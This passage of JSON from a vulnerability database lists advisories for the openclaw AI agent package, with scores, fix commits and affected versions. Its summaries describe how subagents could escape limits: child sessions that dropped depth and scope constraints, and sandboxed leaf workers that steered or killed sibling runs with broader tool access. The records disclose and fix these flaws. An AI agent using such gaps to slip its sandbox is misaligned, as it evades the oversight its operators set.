ories/GHSA-fh32-73r9-rgh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe
-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41372","GHSA-fh32-73r9-rgh5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xfgw-ua7r-abbr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95118?format=json","vulnerability_id":"VCID-xj73-kszs-yygp","summary":"OpenClaw's ACP child sessions inherit subagent security envelope constraints\n## Summary\nBefore the fix, ACP child sessions could fail to inherit subagent security envelope constraints; fixed versions enforce that inheritance.\n\n## 
Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nA restricted subagent spawning an ACP child session could fail to carry forward subagent-only constraints such as depth, child-count limits, control scope, or target-agent restrictions.\n\n## Fix\nACP spawn now resolves and persists child subagent envelope fields, enforces maximum depth and active-child caps, and applies the inherited control scope to child ACP sessions.\n\n## Fix Commit(s)\n- 31160dc069b7cc5d833b39c53736a41ad3befda2\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft, @qclawer, and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44997","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08411","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08403","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08423","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44997"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N
/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/commit/31160dc069b7cc5d833b39c53736a41ad3befda2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q3jj-46pq-826r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44997","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44997"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions","reference_id":"","reference_type":"","scores":[{"v
alue":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T17:25:34Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-security-envelope-constraint-bypass-in-acp-child-sessions"},{"reference_url":"https://github.com/advisories/GHSA-q3jj-46pq-826r","reference_id":"GHSA-q3jj-46pq-826r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q3jj-46pq-826r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["CVE-2026-44997","GHSA-q3jj-46pq-826r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xj73-kszs-yygp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89086?format=json","vulnerability_id":"VCID-xnvm-rp36-vyaj","summary":"OpenClaw: Concurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths\n## Impact\n\nConcurrent async auth attempts can bypass the intended shared-secret rate-limit budget on Tailscale-capable paths.\n\nConcurrent asynchronous shared-secret auth attempts could race the per-key 
rate-limit budget.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.4`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @Telecaster2147 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41913","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41913"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_e
lements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-25wv-8phj-8p7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41913","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41913"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts","reference_id":"","reference_type":"","sc
ores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:46:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-rate-limit-bypass-via-concurrent-async-authentication-attempts"},{"reference_url":"https://github.com/advisories/GHSA-25wv-8phj-8p7r","reference_id":"GHSA-25wv-8phj-8p7r","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-25wv-8phj-8p7r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110113?format=json","purl":"pkg:npm/openclaw@2026.4.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110881?format=json","purl":"pkg:npm/openclaw@2026.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID
-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID
-w2yd-uw91-9yck"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-x1qe-u363-qqaa"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"}],"aliases":["CVE-2026-41913","GHSA-25wv-8phj-8p7r"],"risk_score":2.9,"exploitability":"0.5","weighted_severity":"5.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xnvm-rp36-vyaj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91332?format=json","vulnerability_id":"VCID-xpnh-32hh-p7fb","summary":"OpenClaw: Leaf subagents could steer sibling sessions across sandbox boundaries\n## Summary\nIn affected versions of `openclaw`, sandboxed leaf subagents could still access the `subagents` control surface and resolve against the parent requester scope instead of remaining confined to their own session tree.\n\n## Impact\nA low-privilege sandboxed leaf worker could steer or kill a sibling run owned by the same requester and cause that sibling to execute with its own broader tool policy. This is a sandbox and session-scope boundary bypass.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nLeaf subagents retained the `subagents` tool, and subagent control requests were authorized against the parent requester scope rather than the caller's own spawned descendants. 
The control path prevented only self-targeting, not cross-sibling steering.\n\n## Fix\nOpenClaw now removes `subagents` control access from leaf subagents by default, scopes subagent control to the caller's own descendants, and rejects `steer` and `kill` requests that target runs outside that descendant tree. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4w7m-58cg-cmff","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4w7m-58cg-cmff"},{"reference_url":"https://github.com/advisories/GHSA-4w7m-58cg-cmff","reference_id":"GHSA-4w7m-58cg-cmff","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4w7m-58cg-cmff"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/open
claw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerabil
ity":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz